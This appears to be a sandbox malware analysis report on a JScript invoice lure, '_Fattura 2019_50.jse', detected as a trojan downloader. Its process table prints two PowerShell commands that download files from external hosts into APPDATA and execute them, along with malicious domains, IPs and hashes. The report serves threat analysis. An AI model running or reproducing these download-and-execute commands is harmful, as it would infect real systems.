File name: | _Fattura 2019_50.jse |
Full analysis: | https://app.any.run/tasks/7d68e809-09d2-4721-82c3-05df34999941 |
Verdict: | Malicious activity |
Analysis date: | January 22, 2019, 17:34:44 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines |
MD5: | 3F5B96FFEAFA914991D130D59D44D7E0 |
SHA1: | A9362E4A65069976C9DCB72635537CCF1A908A66 |
SHA256: | 9275F9F4CD8C65C6A4D0F9D1422D714A3D32430EA73144F3B5841818C8ED2669 |
SSDEEP: | 96:lgIczaMvoad6ZbsyAyouOOrJmIKltF/lJ1uJ6DCYiBNmwZZ6u8+eSavaka:lzO4ZbF7oBltF/lDc2gBNm8Z2+ePvFa |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3000 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\_Fattura 2019_50.jse" | C:\Windows\System32\WScript.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
1536 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $iesyvguus = $env:APPDATA + 'SelfServce.exe.exe'; ( New-Object System.Net.WebClient ).DownloadFile('http://fm.centeredinself.com/index',$iesyvguus); Start-Process $iesyvguus; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WScript.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2288 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $yfajwscb = $env:APPDATA + 'hp68581.jpg.jpg'; ( New-Object System.Net.WebClient ).DownloadFile('http://www.flpscuolafoggia.it/wp-content/uploads/2018/12/auguri-di-capodanno-2019.jpg',$yfajwscb); Start-Process $yfajwscb; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WScript.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3944 | "C:\Windows\system32\ntvdm.exe" -i1 | C:\Windows\system32\ntvdm.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: NTVDM.EXE Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3144 | C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503} | C:\Windows\system32\DllHost.exe | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: COM Surrogate Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
1536 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P3R4QB9HC91JJGDJ1OOT.temp | — | |
MD5:— | SHA256:— | |||
2288 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\B090HFYIJ0M7CNDIZ3QM.temp | — | |
MD5:— | SHA256:— | |||
3944 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scsF35D.tmp | — | |
MD5:— | SHA256:— | |||
3944 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scsF36D.tmp | — | |
MD5:— | SHA256:— | |||
2288 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20ed23.TMP | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
1536 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
1536 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20ed23.TMP | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
2288 | powershell.exe | C:\Users\admin\AppData\Roaminghp68581.jpg.jpg | image | |
MD5:3470A9058F7B8A3858C0FEAF8A3E2BD3 | SHA256:C835879D0E3AE1CBA698B49481DA41A26CE605B8C5082ED3309873613D9AF202 | |||
2288 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
1536 | powershell.exe | C:\Users\admin\AppData\RoamingSelfServce.exe.exe | text | |
MD5:C87363BA121297B063E83344E122B6D3 | SHA256:F8BF41177A5F5E808A7CCB648B51080B031F15CA8018D91A576263D6CC626EB6 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2288 | powershell.exe | GET | 200 | 62.141.56.35:80 | http://www.flpscuolafoggia.it/wp-content/uploads/2018/12/auguri-di-capodanno-2019.jpg | DE | image | 264 Kb | unknown |
1536 | powershell.exe | GET | 200 | 185.189.149.177:80 | http://fm.centeredinself.com/index | CH | text | 4 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2288 | powershell.exe | 62.141.56.35:80 | www.flpscuolafoggia.it | Keyweb AG | DE | unknown |
1536 | powershell.exe | 185.189.149.177:80 | fm.centeredinself.com | SOFTplus Entwicklungen GmbH | CH | malicious |
Domain | IP | Reputation |
---|---|---|
fm.centeredinself.com |
| malicious |
www.flpscuolafoggia.it |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
1536 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
1536 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |